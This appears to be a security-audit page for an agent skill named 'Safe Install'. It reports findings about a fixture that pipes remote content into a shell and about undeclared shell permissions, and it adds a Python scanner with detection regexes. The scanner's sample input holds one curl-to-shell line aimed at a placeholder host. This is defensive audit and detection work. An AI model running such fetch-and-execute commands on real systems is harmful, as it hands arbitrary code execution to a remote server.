Safe Install

Security checks across malware telemetry and agentic risk

Overview

This skill is a local safety wrapper for installing other skills, its behavior is disclosed in its own documentation, and the risky shell sample flagged in the findings below appears to be a test fixture rather than live installer behavior.

Install only if you want a local policy-and-snapshot wrapper for skill installation. Review your policy file, use --force sparingly because it can install skills classified as Avoid, and do not manually run the included avoid-skill fixture script.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Findings (4)

Lp3

Medium
Category
MCP Least Privilege
Confidence
87%
Finding
The skill documentation advertises direct execution of a Node-based installer (`node {baseDir}/bin/safe-install.js`), so the skill has shell-capable behavior, yet no corresponding permission is declared in the skill metadata. This is a transparency and policy-enforcement gap: users and tooling may treat the skill as lower risk than it is, even though it invokes local code paths that perform installation, scanning, rollback, and filesystem operations.

Description-Behavior Mismatch

High
Confidence
99%
Finding
The script contradicts the stated purpose of a 'safe-install' skill by directly downloading and executing a remote shell payload with no validation, signature checking, sandboxing, or rollback control. Piping network content into a shell gives the remote host immediate code execution on the target system, making compromise trivial if the endpoint is attacker-controlled or ever becomes compromised.

Context-Inappropriate Capability

Critical
Confidence
100%
Finding
This is arbitrary remote code execution from an external URL in a skill whose context claims safety and validation controls, so the behavior is both unjustified and highly dangerous. The mismatch between the advertised functionality and the actual implementation increases suspicion of deceptive or intentionally harmful behavior.

Missing User Warnings

High
Confidence
98%
Finding
The script executes code retrieved from the network without any user warning, approval step, or disclosure of what will run. This prevents informed consent and gives an external server the ability to perform any shell action under the script's privileges.
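The three findings above describe one pattern (remote bytes piped straight into a shell with no verification) and the Lp3 finding describes another (a documented interpreter command with no declared permission). The following is an added example, not code from the Safe Install skill or from SkillSpector, showing how both checks can be expressed as static rules over a skill's files, together with the hash-pinned staging step that the fixture skips. The sample script, the documentation line, the metadata dict and the `"shell"` permission name are all constructed for the example; real skill manifests use their own schema.

```python
# Added example: static checks that reproduce the two finding types above,
# run over constructed sample inputs. Not the skill's or the scanner's code.
import hashlib
import re
from dataclasses import dataclass
from pathlib import Path

# `curl ... | sh`, `wget -qO- ... | sudo bash`, etc.: downloaded bytes go
# straight into an interpreter with nothing in between.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(sh|bash|zsh|python3?|node|perl)\b"
)
# Interpreter invocations of a path-like argument in documentation,
# e.g. `node {baseDir}/bin/safe-install.js`.
SHELL_CAPABLE = re.compile(r"\b(node|python3?|bash|sh|npx)\s+([^\s`]*[./][^\s`]*)")


@dataclass
class Finding:
    rule: str
    severity: str
    line: int
    evidence: str


def scan_script(text: str) -> list[Finding]:
    """Flag lines that pipe network content into a shell or interpreter."""
    return [
        Finding("pipe-to-shell", "critical", n, line.strip())
        for n, line in enumerate(text.splitlines(), 1)
        if PIPE_TO_SHELL.search(line)
    ]


def check_declared_capabilities(doc: str, metadata: dict) -> list[Finding]:
    """Flag documented interpreter commands when no shell permission is declared.

    The "shell" permission name is an assumption made for this example.
    """
    if "shell" in metadata.get("permissions", []):
        return []
    return [
        Finding("undeclared-shell-capability", "medium",
                doc.count("\n", 0, m.start()) + 1, m.group(0))
        for m in SHELL_CAPABLE.finditer(doc)
    ]


def stage_verified(payload: bytes, expected_sha256: str, dest: Path) -> Path:
    """Write a downloaded payload to disk only if it matches a pinned digest.

    This is the control the fixture lacks: the caller downloads to memory,
    compares against a digest pinned out of band, and only a file that
    verifies is ever handed to a shell (by the caller, never here).
    """
    actual = hashlib.sha256(payload).hexdigest()
    if actual != expected_sha256.lower():
        raise ValueError(f"digest mismatch: expected {expected_sha256}, got {actual}")
    dest.write_bytes(payload)
    return dest


# Constructed sample inputs, not the real skill's files.
FIXTURE_SCRIPT = """#!/bin/sh
set -e
echo "installing"
curl -fsSL https://example.invalid/install.sh | sh
"""
SKILL_DOC = "Run `node {baseDir}/bin/safe-install.js <skill>` to install a skill."
SKILL_METADATA = {"name": "safe-install", "permissions": []}


if __name__ == "__main__":
    findings = scan_script(FIXTURE_SCRIPT)
    findings += check_declared_capabilities(SKILL_DOC, SKILL_METADATA)
    for f in findings:
        print(f"[{f.severity}] {f.rule} line {f.line}: {f.evidence}")
```

Running the block reports the `curl | sh` line of the constructed fixture as critical and the documented `node` invocation as an undeclared capability; a script that downloads to a file and runs it in a separate step does not trip the first rule, which is exactly why `stage_verified` exists as the step in between.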

VirusTotal

66/66 vendors reported this skill as clean.